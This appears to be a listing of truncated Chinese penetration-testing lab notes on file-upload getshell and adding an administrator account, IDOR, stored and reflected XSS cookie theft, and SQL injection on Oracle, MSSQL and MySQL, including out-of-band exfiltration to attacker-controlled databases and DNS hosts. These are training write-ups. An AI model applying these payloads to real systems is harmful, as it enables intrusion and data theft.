文件上传靶场权限控制缺陷导致用户直接获取system权限getshell
在上传图片getshell 后 net user 查看 whoami , net 然后添加到管理员组net localgroup administrators 123查看3389 netstat -ano |findstr 3389 没有找到,查看 进程 tasklist 也没有找到开启3389REG ADD&nbs
上海某公司渗透项目主管 面试经验分享 — 12k
面试心得:面试时心态要稳,说话要诚恳,最后一课视频一定要多看,个人看了五次。所面试的公司:上海市某信息技术有限公司所在城市:上海面试职位:渗透项目主管面试过程:人事 + 总监面试官常问的问题:———————— - 。- !!!解:面试的五家公司都问了工作经验或者项目经验!这点非常非常重要!解:都问过提交过哪些漏洞?解:大多会问报错,dns,盲注 的原理,切记原理一定要说的很
11.2 越权漏洞
1.打开靶场,http://117.41.229.122:8002/d/index.asp,注册两个账号两个号各填写一个保修物品。3点开工单详情,刷新界面,截取数据包,。4.如果我们把cookie里所有h1换成h2,就可以看到h2账户里的保修信息,实现水平越权~5.我们把shenfen改成1,且admin改成1可以进入后台管理。6.在用户管理界面找到flag。flag:flag{yueq
存储型xss
第一步 找到指纹信息。finecms 5.3第二步百度下。因为赶时间学完去找工作。没工夫下载源码实践啦....意思是。开发没写死错误日志含有xss. 第三步去xss平台 找一个获取cookie的 js语句。117.41.229.122:8082/index.php?c=show&id=special-temp-test <https://xsspt.com/tpnhdP&g
9.1、反射型XSS靶场------要点和笔记
打开靶场。看见框框就来插一把xss 反射型 主要功能偷取COOKIE IP 网页明文账号和密码 以及 键盘信息。会注入就可以尝试xss平台了。。。第一步: 插入一半,吃了一半。<script>alert('xss')</script>看元素发现被函数 html specialchars
11.3、支付漏洞
看了课 直接试了下。burpsurit 看了下。发现真的不需要抓包。靶场做的太那个啥了。 就当体验把在会员中心里面直接找到flag
5.4.1、Oracle注入- 报错注入
dual 为了满足查询结构 select 9+1 from Dualselect * from all_tables 查询出所以的表select * from user_tables 查询出当前用户的表select * from all_tab_columns 查询出所有的字段select * from user_tab_columns 查询当前用户的
5.3.1、MSSQL注入 - 反弹注入
我理解的意思是。把目标主机数据库信息通过拼接函数opendatasource发送到我发数据库中。第一步注册 虚拟主机第二步 创建一个表包括4个字段CREAT table test(id int,name1 char,name2 char(255),name3 char(255))第三步 拼接url 注意 ‘; 闭合insert into opendatasource('
mssql 显错注入
第一步 查字段一共有四个字段,靶场的问题。第二步 NULL 用来填充 注释只有 -- 用%23也不行。 http://120.203.13.75:8150/MSSQL/?id=2' and 1=3 union all select NULL,NULL,NULL from adm
mysql -dns注入
DNS注入,是利用DNS在解析的时候会留下的有用的日志,利用这个日志来获取回显注册ceye.设置new.dns 记住二级域名。http://120.203.13.75:8120/index3.php/1.txt?id=1 and (SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.2z4ne3.